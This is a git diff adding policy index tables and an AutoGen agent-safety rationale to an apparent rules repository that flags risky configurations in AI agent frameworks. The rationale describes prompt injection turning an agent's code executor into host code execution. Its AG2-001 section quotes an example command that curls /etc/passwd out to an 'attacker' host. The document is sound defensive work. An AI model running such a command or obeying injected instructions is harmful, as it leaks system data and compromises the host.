[mcp/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/code_execution.yaml) | +| 103 | LC-001 | LangChain | tool | langchain_tool | LangChain tool has no description | low | 0.80 | 12.0 | [langchain/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/tool_definition.yaml) | +| 104 | LC-002 | LangChain | tool | langchain_tool | LangChain tool parameters are not type-annotated | medium | 0.85 | 34.0 | [langchain/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/tool_definition.yaml) | +| 105 | LC-003 | LangChain | tool | langchain_tool | LangChain tool body spawns a subprocess | high | 0.85 | 59.5 | [langchain/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/shell_safety.yaml) | +| 106 | LC-004 | LangChain | tool | langchain_tool | LangChain tool body evaluates dynamic code | high | 0.85 | 59.5 | [langchain/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/code_execution.yaml) | +| 107 | LC-005 | LangChain | tool | langchain_tool | LangChain tool fetches a caller-controlled URL (SSRF) | high | 0.80 | 56.0 | [langchain/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/ssrf.yaml) | +| 108 | LC-006 | LangChain | tool | langchain_tool | LangChain tool returns its output directly, bypassing the model | medium | 0.80 | 32.0 | [langchain/tool_behavior.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/tool_behavior.yaml) | +| 109 | LC-010 | LangChain | tool | langchain_tool | TypeScript LangChain tool has no description | low | 0.80 | 12.0 | [langchain/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/tool_definition.yaml) | +| 110 | LC-011 | LangChain | tool | langchain_tool | TypeScript LangChain tool body spawns a subprocess | high | 0.85 | 59.5 | 
[langchain/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/shell_safety.yaml) | +| 111 | LC-012 | LangChain | tool | langchain_tool | TypeScript LangChain tool evaluates dynamic code | high | 0.85 | 59.5 | [langchain/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/code_execution.yaml) | +| 112 | LC-013 | LangChain | tool | langchain_tool | TypeScript LangChain tool fetches a caller-controlled URL (SSRF) | high | 0.80 | 56.0 | [langchain/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/ssrf.yaml) | +| 113 | LC-014 | LangChain | tool | langchain_tool | TypeScript LangChain tool returns its output directly, bypassing the model | medium | 0.80 | 32.0 | [langchain/tool_behavior.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/tool_behavior.yaml) | +| 114 | LC-101 | LangChain | agent | langchain_agent, langchain_agent_executor | LangChain agent wires a code-execution or shell built-in tool | high | 0.85 | 59.5 | [langchain/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/agent_safety.yaml) | +| 115 | LC-102 | LangChain | agent | langchain_agent_executor | LangChain AgentExecutor has no max_iterations limit | medium | 0.80 | 32.0 | [langchain/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/agent_safety.yaml) | +| 116 | LC-111 | LangChain | agent | langchain_agent_executor | TypeScript LangChain AgentExecutor has no maxIterations limit | medium | 0.80 | 32.0 | [langchain/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/agent_safety.yaml) | +| 117 | LC-201 | LangChain | repo | langchain | LangChain project ships no agent-guidance doc (AGENTS.md/CLAUDE.md) | low | 0.90 | 13.5 | [langchain/repo_hygiene.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/repo_hygiene.yaml) | +| 118 | CREW-001 | CrewAI | tool | crewai_tool | CrewAI tool has no 
description | low | 0.90 | 13.5 | [crewai/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/tool_definition.yaml) | +| 119 | CREW-002 | CrewAI | tool | crewai_tool | CrewAI tool parameters are not type-annotated | medium | 0.85 | 34.0 | [crewai/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/tool_definition.yaml) | +| 120 | CREW-003 | CrewAI | tool | crewai_tool | CrewAI tool body evaluates dynamic code | high | 0.85 | 59.5 | [crewai/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/code_execution.yaml) | +| 121 | CREW-004 | CrewAI | tool | crewai_tool | CrewAI tool body spawns a subprocess | high | 0.85 | 59.5 | [crewai/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/shell_safety.yaml) | +| 122 | CREW-005 | CrewAI | tool | crewai_tool | CrewAI tool fetches a caller-controlled URL (SSRF) | high | 0.80 | 56.0 | [crewai/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/ssrf.yaml) | +| 123 | CREW-006 | CrewAI | tool | crewai_tool | Mutating CrewAI tool has no idempotency key | medium | 0.55 | 22.0 | [crewai/idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/idempotency.yaml) | +| 124 | CREW-101 | CrewAI | agent | crewai_agent | CrewAI agent enables built-in code execution | high | 0.90 | 63.0 | [crewai/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/agent_safety.yaml) | +| 125 | CREW-102 | CrewAI | agent | crewai_agent | CrewAI agent runs code execution in unsafe mode | high | 0.90 | 63.0 | [crewai/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/agent_safety.yaml) | +| 126 | CREW-103 | CrewAI | agent | crewai_agent | CrewAI agent wires the code-interpreter built-in tool | high | 0.85 | 59.5 | [crewai/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/code_execution.yaml) | +| 127 | CREW-104 | CrewAI | 
agent | crewai_agent | CrewAI agent allows delegation to peer agents | medium | 0.75 | 30.0 | [crewai/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/agent_safety.yaml) | +| 128 | CREW-106 | CrewAI | agent | crewai_agent | CrewAI agent grants an unconstrained FileReadTool | high | 0.70 | 49.0 | [crewai/dangerous_tools.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/dangerous_tools.yaml) | +| 129 | CREW-107 | CrewAI | agent | crewai_agent | CrewAI agent wires a tool that fetches model-chosen URLs | medium | 0.70 | 28.0 | [crewai/dangerous_tools.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/dangerous_tools.yaml) | +| 130 | CREW-108 | CrewAI | tool | crewai_tool | CrewAI tool returns its output as the final answer | medium | 0.60 | 24.0 | [crewai/tool_behavior.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/tool_behavior.yaml) | +| 131 | CREW-201 | CrewAI | repo | crewai | CrewAI project ships no agent-guidance doc (AGENTS.md/CLAUDE.md) | low | 0.90 | 13.5 | [crewai/repo_hygiene.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/repo_hygiene.yaml) | +| 132 | AG2-001 | AutoGen | agent | autogen_conversable_agent, autogen_user_proxy_agent | AutoGen executor runs code on the host without Docker | high | 0.90 | 63.0 | [autogen/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/agent_safety.yaml) | +| 133 | AG2-002 | AutoGen | agent | autogen_conversable_agent, autogen_user_proxy_agent | AutoGen executor runs code with no human review (human_input_mode=NEVER) | high | 0.85 | 59.5 | [autogen/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/agent_safety.yaml) | +| 134 | AG2-004 | AutoGen | agent | autogen_group_chat_manager | AutoGen GroupChatManager has no max_round bound | medium | 0.80 | 32.0 | [autogen/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/agent_safety.yaml) | +| 135 | 
AG2-005 | AutoGen | agent | autogen_assistant_agent | AutoGen AssistantAgent enables code execution on the LLM agent | medium | 0.70 | 28.0 | [autogen/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/agent_safety.yaml) | +| 136 | AG2-006 | AutoGen | agent | autogen_conversable_agent, autogen_user_proxy_agent | AutoGen executor with code execution has no auto-reply cap | medium | 0.70 | 28.0 | [autogen/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/agent_safety.yaml) | +| 137 | AG2-007 | AutoGen | tool | autogen_tool | AutoGen tool has no description | low | 0.90 | 13.5 | [autogen/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/tool_definition.yaml) | +| 138 | AG2-008 | AutoGen | tool | autogen_tool | AutoGen tool parameters are not type-annotated | medium | 0.85 | 34.0 | [autogen/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/tool_definition.yaml) | +| 139 | AG2-009 | AutoGen | tool | autogen_tool | AutoGen tool body spawns a subprocess | high | 0.85 | 59.5 | [autogen/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/shell_safety.yaml) | +| 140 | AG2-010 | AutoGen | tool | autogen_tool | AutoGen tool body evaluates dynamic code | high | 0.85 | 59.5 | [autogen/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/code_execution.yaml) | +| 141 | AG2-011 | AutoGen | tool | autogen_tool | AutoGen tool fetches a caller-controlled URL (SSRF) | high | 0.80 | 56.0 | [autogen/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/ssrf.yaml) | +| 142 | AG2-012 | AutoGen | tool | autogen_tool | AutoGen tool network call has no timeout | medium | 0.80 | 32.0 | [autogen/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/network.yaml) | +| 143 | AG2-201 | AutoGen | repo | autogen | AutoGen project ships no agent-guidance doc (AGENTS.md/CLAUDE.md) | 
low | 0.90 | 13.5 | [autogen/repo_hygiene.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/repo_hygiene.yaml) | +| 144 | VAI-001 | Vercel AI | tool | vercel_ai_tool | Vercel AI tool execute() spawns a subprocess | high | 0.85 | 59.5 | [vercel_ai/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/vercel_ai/shell_safety.yaml) | +| 145 | VAI-002 | Vercel AI | tool | vercel_ai_tool | Vercel AI tool execute() evaluates code (eval / new Function) | high | 0.90 | 63.0 | [vercel_ai/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/vercel_ai/code_execution.yaml) | +| 146 | VAI-003 | Vercel AI | tool | vercel_ai_tool | Vercel AI tool execute() fetches a model-controlled URL | high | 0.75 | 52.5 | [vercel_ai/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/vercel_ai/ssrf.yaml) | +| 147 | VAI-004 | Vercel AI | tool | vercel_ai_tool | Vercel AI tool has no description | low | 0.90 | 13.5 | [vercel_ai/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/vercel_ai/tool_definition.yaml) | +| 148 | VAI-005 | Vercel AI | tool | vercel_ai_tool | Vercel AI tool accepts untyped input | medium | 0.80 | 32.0 | [vercel_ai/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/vercel_ai/tool_definition.yaml) | +| 149 | VAI-006 | Vercel AI | agent | vercel_ai_agent | Vercel AI agent wires a provider shell / computer / code-execution tool | high | 0.85 | 59.5 | [vercel_ai/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/vercel_ai/agent_safety.yaml) | +| 150 | VAI-007 | Vercel AI | agent | vercel_ai_agent | Vercel AI agent tool loop has no step bound | medium | 0.60 | 24.0 | [vercel_ai/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/vercel_ai/agent_safety.yaml) | +| 151 | VAI-008 | Vercel AI | agent | vercel_ai_agent | Vercel AI agent forces a provider execution tool every step | medium | 0.65 | 26.0 | 
[vercel_ai/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/vercel_ai/agent_safety.yaml) | +| 152 | VAI-012 | Vercel AI | repo | vercel_ai | Vercel AI project ships no agent-guidance doc (AGENTS.md/CLAUDE.md) | low | 0.90 | 13.5 | [vercel_ai/repo_hygiene.yaml](https://github.com/trustabl/trustabl-rules/blob/main/vercel_ai/repo_hygiene.yaml) | +| 153 | PYD-001 | Pydantic AI | tool | pydantic_ai_tool | Pydantic AI tool has no description | low | 0.90 | 13.5 | [pydantic_ai/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/tool_definition.yaml) | +| 154 | PYD-002 | Pydantic AI | tool | pydantic_ai_tool | Pydantic AI tool parameters are not type-annotated | medium | 0.85 | 34.0 | [pydantic_ai/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/tool_definition.yaml) | +| 155 | PYD-003 | Pydantic AI | tool | pydantic_ai_tool | Pydantic AI tool body spawns a subprocess | high | 0.85 | 59.5 | [pydantic_ai/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/shell_safety.yaml) | +| 156 | PYD-004 | Pydantic AI | tool | pydantic_ai_tool | Pydantic AI tool body evaluates dynamic code | high | 0.85 | 59.5 | [pydantic_ai/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/code_execution.yaml) | +| 157 | PYD-005 | Pydantic AI | tool | pydantic_ai_tool | Pydantic AI tool fetches a caller-controlled URL (SSRF) | high | 0.80 | 56.0 | [pydantic_ai/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/ssrf.yaml) | +| 158 | PYD-006 | Pydantic AI | tool | pydantic_ai_tool | Pydantic AI tool network call has no timeout | high | 0.85 | 59.5 | [pydantic_ai/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/network.yaml) | +| 159 | PYD-007 | Pydantic AI | tool | pydantic_ai_tool | Mutating Pydantic AI tool has no idempotency key | medium | 0.55 | 22.0 | 
[pydantic_ai/idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/idempotency.yaml) | +| 160 | PYD-101 | Pydantic AI | agent | pydantic_ai_agent | Pydantic AI agent has no structured output validation | low | 0.70 | 10.5 | [pydantic_ai/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/agent_safety.yaml) | +| 161 | PYD-102 | Pydantic AI | agent | pydantic_ai_agent | Pydantic AI agent wires the code-execution native tool | high | 0.85 | 59.5 | [pydantic_ai/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/agent_safety.yaml) | +| 162 | PYD-103 | Pydantic AI | agent | pydantic_ai_agent | Pydantic AI agent wires a model-driven URL-fetching native tool | medium | 0.75 | 30.0 | [pydantic_ai/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/agent_safety.yaml) | +| 163 | PYD-105 | Pydantic AI | agent | pydantic_ai_agent | Pydantic AI agent retries with the exhaustive end strategy | low | 0.70 | 10.5 | [pydantic_ai/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/agent_safety.yaml) | +| 164 | PYD-201 | Pydantic AI | repo | pydantic_ai | Pydantic AI project ships no agent-guidance doc (AGENTS.md/CLAUDE.md) | low | 0.90 | 13.5 | [pydantic_ai/repo_hygiene.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/repo_hygiene.yaml) | diff --git a/autogen/POLICY_INDEX.md b/autogen/POLICY_INDEX.md new file mode 100644 index 0000000..582b33e --- /dev/null +++ b/autogen/POLICY_INDEX.md @@ -0,0 +1,21 @@ + +# AutoGen / AG2 policy index + +12 rules — 6 tool · 5 agent · 1 repo + +Risk score = `severity_weight × confidence × 100` (engine formula; weights: low=0.15, medium=0.40, high=0.70). Higher = worse. 
+ +| | Id | SDK/ADK | Scope | Applies To | Policy | Severity | Confidence | Risk | Source | +| -- | ------- | ------- | ----- | --------------------------------------------------- | ------------------------------------------------------------------------ | -------- | ---------- | ---- | --------------------------------------------------------------------------------------------------------- | +| 1 | AG2-001 | AutoGen | agent | autogen_conversable_agent, autogen_user_proxy_agent | AutoGen executor runs code on the host without Docker | high | 0.90 | 63.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/agent_safety.yaml) | +| 2 | AG2-002 | AutoGen | agent | autogen_conversable_agent, autogen_user_proxy_agent | AutoGen executor runs code with no human review (human_input_mode=NEVER) | high | 0.85 | 59.5 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/agent_safety.yaml) | +| 3 | AG2-004 | AutoGen | agent | autogen_group_chat_manager | AutoGen GroupChatManager has no max_round bound | medium | 0.80 | 32.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/agent_safety.yaml) | +| 4 | AG2-005 | AutoGen | agent | autogen_assistant_agent | AutoGen AssistantAgent enables code execution on the LLM agent | medium | 0.70 | 28.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/agent_safety.yaml) | +| 5 | AG2-006 | AutoGen | agent | autogen_conversable_agent, autogen_user_proxy_agent | AutoGen executor with code execution has no auto-reply cap | medium | 0.70 | 28.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/agent_safety.yaml) | +| 6 | AG2-007 | AutoGen | tool | autogen_tool | AutoGen tool has no description | low | 0.90 | 13.5 | [tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/tool_definition.yaml) | +| 7 | AG2-008 | AutoGen | tool | autogen_tool | AutoGen tool parameters 
are not type-annotated | medium | 0.85 | 34.0 | [tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/tool_definition.yaml) | +| 8 | AG2-009 | AutoGen | tool | autogen_tool | AutoGen tool body spawns a subprocess | high | 0.85 | 59.5 | [shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/shell_safety.yaml) | +| 9 | AG2-010 | AutoGen | tool | autogen_tool | AutoGen tool body evaluates dynamic code | high | 0.85 | 59.5 | [code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/code_execution.yaml) | +| 10 | AG2-011 | AutoGen | tool | autogen_tool | AutoGen tool fetches a caller-controlled URL (SSRF) | high | 0.80 | 56.0 | [ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/ssrf.yaml) | +| 11 | AG2-012 | AutoGen | tool | autogen_tool | AutoGen tool network call has no timeout | medium | 0.80 | 32.0 | [network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/network.yaml) | +| 12 | AG2-201 | AutoGen | repo | autogen | AutoGen project ships no agent-guidance doc (AGENTS.md/CLAUDE.md) | low | 0.90 | 13.5 | [repo_hygiene.yaml](https://github.com/trustabl/trustabl-rules/blob/main/autogen/repo_hygiene.yaml) | diff --git a/crewai/POLICY_INDEX.md b/crewai/POLICY_INDEX.md new file mode 100644 index 0000000..a4d8b69 --- /dev/null +++ b/crewai/POLICY_INDEX.md @@ -0,0 +1,23 @@ + +# CrewAI policy index + +14 rules — 7 tool · 6 agent · 1 repo + +Risk score = `severity_weight × confidence × 100` (engine formula; weights: low=0.15, medium=0.40, high=0.70). Higher = worse. 
+ +| | Id | SDK/ADK | Scope | Applies To | Policy | Severity | Confidence | Risk | Source | +| -- | -------- | ------- | ----- | ------------ | ---------------------------------------------------------------- | -------- | ---------- | ---- | -------------------------------------------------------------------------------------------------------- | +| 1 | CREW-001 | CrewAI | tool | crewai_tool | CrewAI tool has no description | low | 0.90 | 13.5 | [tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/tool_definition.yaml) | +| 2 | CREW-002 | CrewAI | tool | crewai_tool | CrewAI tool parameters are not type-annotated | medium | 0.85 | 34.0 | [tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/tool_definition.yaml) | +| 3 | CREW-003 | CrewAI | tool | crewai_tool | CrewAI tool body evaluates dynamic code | high | 0.85 | 59.5 | [code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/code_execution.yaml) | +| 4 | CREW-004 | CrewAI | tool | crewai_tool | CrewAI tool body spawns a subprocess | high | 0.85 | 59.5 | [shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/shell_safety.yaml) | +| 5 | CREW-005 | CrewAI | tool | crewai_tool | CrewAI tool fetches a caller-controlled URL (SSRF) | high | 0.80 | 56.0 | [ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/ssrf.yaml) | +| 6 | CREW-006 | CrewAI | tool | crewai_tool | Mutating CrewAI tool has no idempotency key | medium | 0.55 | 22.0 | [idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/idempotency.yaml) | +| 7 | CREW-101 | CrewAI | agent | crewai_agent | CrewAI agent enables built-in code execution | high | 0.90 | 63.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/agent_safety.yaml) | +| 8 | CREW-102 | CrewAI | agent | crewai_agent | CrewAI agent runs code execution in unsafe mode | high | 0.90 | 63.0 | 
[agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/agent_safety.yaml) | +| 9 | CREW-103 | CrewAI | agent | crewai_agent | CrewAI agent wires the code-interpreter built-in tool | high | 0.85 | 59.5 | [code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/code_execution.yaml) | +| 10 | CREW-104 | CrewAI | agent | crewai_agent | CrewAI agent allows delegation to peer agents | medium | 0.75 | 30.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/agent_safety.yaml) | +| 11 | CREW-106 | CrewAI | agent | crewai_agent | CrewAI agent grants an unconstrained FileReadTool | high | 0.70 | 49.0 | [dangerous_tools.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/dangerous_tools.yaml) | +| 12 | CREW-107 | CrewAI | agent | crewai_agent | CrewAI agent wires a tool that fetches model-chosen URLs | medium | 0.70 | 28.0 | [dangerous_tools.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/dangerous_tools.yaml) | +| 13 | CREW-108 | CrewAI | tool | crewai_tool | CrewAI tool returns its output as the final answer | medium | 0.60 | 24.0 | [tool_behavior.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/tool_behavior.yaml) | +| 14 | CREW-201 | CrewAI | repo | crewai | CrewAI project ships no agent-guidance doc (AGENTS.md/CLAUDE.md) | low | 0.90 | 13.5 | [repo_hygiene.yaml](https://github.com/trustabl/trustabl-rules/blob/main/crewai/repo_hygiene.yaml) | diff --git a/docs/Policy/autogen/agent_safety.md b/docs/Policy/autogen/agent_safety.md new file mode 100644 index 0000000..4453fa8 --- /dev/null +++ b/docs/Policy/autogen/agent_safety.md @@ -0,0 +1,248 @@ +--- +policy_id: autogen_agent_safety +category: autogen +topic: agent_safety +rules: + - id: AG2-001 + severity: high + confidence: 0.9 + scope: agent + fix_type: config + - id: AG2-002 + severity: high + confidence: 0.85 + scope: agent + fix_type: config + - id: AG2-004 + severity: medium + confidence: 
0.8 + scope: agent + fix_type: config + - id: AG2-005 + severity: medium + confidence: 0.7 + scope: agent + fix_type: config + - id: AG2-006 + severity: medium + confidence: 0.7 + scope: agent + fix_type: config +references: [LLM05, LLM06, LLM10] +--- + +# Policy Rationale: AutoGen Agent Safety + +**Policy ID:** `autogen_agent_safety` +**File:** `autogen/agent_safety.yaml` +**Rules:** AG2-001, AG2-002, AG2-004, AG2-005, AG2-006 +**Severities:** high, high, medium, medium, medium +**Fix types:** config, config, config, config, config +**References:** LLM05 (Improper Output Handling), LLM06 (Excessive Agency), LLM10 (Unbounded Consumption) + +--- + +## What this policy covers + +Agent-scope rules for AutoGen / AG2 agents, read off the constructor kwargs of +`ConversableAgent`, `UserProxyAgent`, `AssistantAgent`, and `GroupChatManager`. +They flag the configurations AutoGen's own docs warn against: code execution on +the host with no Docker (AG2-001), code execution with no human review +(AG2-002), an unbounded group-chat loop (AG2-004), code execution enabled on the +LLM-facing assistant (AG2-005), and a code-executing agent with no auto-reply cap +(AG2-006). Each uses the `agent_kwarg_value` / `agent_kwarg_present` / +`agent_kwarg_missing` predicates against the constructor call. + +--- + +## Why executor configuration is a distinct concern in AutoGen + +AutoGen's design splits two responsibilities: an LLM agent *generates* code, and +a separate executor agent *runs* it. The danger lives in how the executor is +configured, because every code block the model emits flows into it. AutoGen's +documentation is explicit — "we strongly recommend Docker" and "local execution +is not recommended" — and these rules flag the exact settings that defeat that +guidance. 
With `use_docker=False` (AG2-001), generated code is written to disk and +executed directly on the host with the agent process's privileges; because the +conversation, tool outputs, and retrieved content are all model-reachable, a +single prompt injection becomes host remote code execution with no container to +contain it. `human_input_mode="NEVER"` on a code-executing agent (AG2-002) +removes the last checkpoint before execution, making the agent fully autonomous — +the model's code runs with zero review. + +Two more rules guard the generate/execute boundary and the loop bounds. +Collapsing generation and execution into one `AssistantAgent` (AG2-005) means the +agent the model fully controls also runs whatever it produces, removing the review +boundary AutoGen's two-agent pattern exists to provide. And unbounded loops are an +Unbounded Consumption (LLM10) hazard with a safety edge: a `GroupChatManager` +with no `max_round` (AG2-004) lets a degenerate conversation run until something +else stops it, and a code-executing executor with no `max_consecutive_auto_reply` +(AG2-006) can auto-execute model code an unbounded number of times — so a single +injected instruction is amplified across many runs, multiplying both cost and +blast radius. + +--- + +## Rule-by-rule defense + +### AG2-001 — Executor runs code on the host without Docker (Severity: high, Confidence: 0.9, Fix type: config) + +**What we detect:** a `ConversableAgent` / `UserProxyAgent` with +`code_execution_config={"use_docker": False}` (predicate `agent_kwarg_value` on +`code_execution_config.use_docker`). + +**Why it is flaggable:** with Docker disabled, model-generated code runs directly +on the host — no container, no isolation. A prompt injection becomes host RCE, +the exact scenario AutoGen's "strongly recommend Docker" guidance addresses. 
+ +**Real-world consequence:** an executor with `use_docker=False` receives an +injected code block that runs `os.system("curl attacker/$(cat /etc/passwd)")` on +the host with the service account's privileges. + +**Why severity is high and not critical:** the engine reserves critical for +exposures with no precondition; here the agent must both have code execution +enabled and be reachable by model-influenced input, and the fix is a single +config flip — high reflects a serious, conditional RCE path. **Fix type — +config:** set `use_docker=True` or disable execution, a constructor change. +**Confidence 0.9:** the literal-value match is unambiguous; the small gap covers +an executor whose input is provably never untrusted. + +### AG2-002 — Executor runs code with no human review (Severity: high, Confidence: 0.85, Fix type: config) + +**What we detect:** an agent with `human_input_mode="NEVER"` AND a +`code_execution_config` present (predicates `agent_kwarg_value` + +`agent_kwarg_present`). + +**Why it is flaggable:** the combination makes a code-executing agent fully +autonomous — every emitted code block runs with no human in the loop, so an +injection executes attacker code with no chance to intervene. + +**Real-world consequence:** an unattended pipeline runs a code-executing executor +with `human_input_mode="NEVER"`; an injected instruction in a fetched document is +executed without any approval prompt. + +**Why severity is high and not critical:** like AG2-001 it requires code +execution to be enabled and reachable; high, not critical, because the precondition +exists and the executor may still run in Docker (limiting the blast radius to the +container). **Fix type — config:** set `human_input_mode` to `ALWAYS`/`TERMINATE` +or disable execution. **Confidence 0.85:** the rule confirms execution is +configured and review is off, but cannot see an out-of-band approval gate the team +may have wired around the agent — a small over-flag. 
+ +### AG2-004 — GroupChatManager has no max_round bound (Severity: medium, Confidence: 0.8, Fix type: config) + +**What we detect:** a `GroupChatManager` (or `GroupChat`) with no `max_round` +kwarg (predicate `agent_kwarg_missing`). + +**Why it is flaggable:** with no round cap the speaker-selection loop has no +upper bound; a degenerate conversation runs until the budget or wall-clock is +exhausted (LLM10), and if participants hold side-effecting tools the same +mutation can be applied repeatedly. + +**Real-world consequence:** two agents keep handing a task back and forth because +neither emits the termination signal; the chat burns API budget for hundreds of +rounds before a timeout kills it. + +**Why severity is medium and not high:** the usual outcome is a cost/availability +incident rather than a direct compromise — serious but recoverable, and only a +safety problem when looped tools have side effects. **Fix type — config:** pass +`max_round=`. **Confidence 0.8:** a chat wrapped by an external timeout or a +custom loop guard is over-flagged, since the rule sees only the constructor +kwarg. + +### AG2-005 — AssistantAgent enables code execution on the LLM agent (Severity: medium, Confidence: 0.7, Fix type: config) + +**What we detect:** an `AssistantAgent` with a `code_execution_config` present +(predicate `agent_kwarg_present`). + +**Why it is flaggable:** AutoGen's recommended pattern keeps the +`AssistantAgent` at `code_execution_config=False` and routes execution through a +separate `UserProxyAgent`. Enabling execution on the assistant collapses the +generate/execute boundary, so the model-controlled agent also runs its own +output. + +**Real-world consequence:** an `AssistantAgent` configured to both generate and +execute is prompt-injected; the injected code runs in the same agent with no +executor review step between generation and execution. 
+ +**Why severity is medium and not high:** it is a defense-in-depth/architecture +finding — the assistant's executor may still be Dockered and the risk depends on +that executor's own settings (which AG2-001/002 cover) — so removing the boundary +is a weakening rather than a direct RCE grant. **Fix type — config:** set the +assistant's `code_execution_config=False` and use a dedicated executor. +**Confidence 0.7:** presence of `code_execution_config` does not by itself prove +the execution is unsafe (it may point at a hardened Docker executor), so the rule +over-flags safe two-role setups that happen to set the kwarg on the assistant. + +### AG2-006 — Code-executing executor has no auto-reply cap (Severity: medium, Confidence: 0.7, Fix type: config) + +**What we detect:** a `ConversableAgent` / `UserProxyAgent` with a +`code_execution_config` present AND no `max_consecutive_auto_reply` kwarg +(predicates `agent_kwarg_present` + `agent_kwarg_missing`). + +**Why it is flaggable:** with no auto-reply cap a code-executing agent can +auto-respond — and therefore auto-execute model code — an unbounded number of +times in one exchange, amplifying the cost and blast radius of a single injected +instruction. + +**Real-world consequence:** an executor with no `max_consecutive_auto_reply` +loops on a failing code block, re-executing slightly varied attacker code dozens +of times before anything stops it. + +**Why severity is medium and not high:** it is an amplifier of the underlying +code-execution risk (covered by AG2-001/002), not a fresh RCE path on its own; +its impact is the unbounded *repetition* rather than the execution itself. **Fix +type — config:** set `max_consecutive_auto_reply=` to a small integer. +**Confidence 